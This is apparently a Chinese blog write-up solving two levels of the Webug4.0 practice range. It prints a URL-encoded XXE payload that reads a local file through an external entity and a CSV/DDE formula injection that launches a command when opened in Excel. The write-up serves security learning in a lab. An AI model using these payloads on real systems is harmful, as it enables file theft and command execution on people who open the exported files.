Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入

一、xxe注入

这道题应该是XXE漏洞最基础的任意文件读取

打开是一个输入框

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第1张图片
在C盘构造一个flag。别问我为啥,为也不知道

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第2张图片
bp抓个包

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第3张图片
随便输入个什么都有回显,应该是基础的XXE注入


这是一段读取文件的xml

   
]>

    &B;
   

由于存在换行,所以转化为URL编码:%3C%3F%78%6D%6C%20%76%65%72%73%69%6F%6E%3D%22%31%2E%30%22%3F%3E%0D%0A%3C%21%44%4F%43%54%59%50%45%20%41%4E%59%20%5B%0D%0A%20%20%20%20%3C%21%45%4E%54%49%54%59%20%42%20%53%59%53%54%45%4D%20%22%66%69%6C%65%3A%2F%2F%2F%63%3A%2F%31%2E%74%78%74%22%3E%0D%0A%5D%3E%0D%0A%3C%78%6D%6C%3E%0D%0A%20%20%20%20%3C%78%78%65%3E%26%42%3B%3C%2F%78%78%65%3E%0D%0A%3C%2F%78%6D%6C%3E%20%20%20

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第4张图片成功读取到本地flag

二、csv注入

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量。攻击包含向恶意的EXCEL公式中注入可以输出或以CSV文件读取的参数。当在Excel中打开CSV文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能。在这个过程中,CSV中的所有Excel公式都会执行。当该函数有合法意图时,很易被滥用并允许恶意代码执行。

打开靶场

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第5张图片

当输入一个公式,会被Excel自动运算并执行。

我们构造以下代码

=1+cmd|' /C calc'!A0

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第6张图片

当我们导出时,生成csv文件时,打开

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第7张图片

 

Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入_第8张图片

然后。。。。。。。

你可能感兴趣的:(Webug4.0靶场通关笔记(第四天)--------xxe注入和csv注入)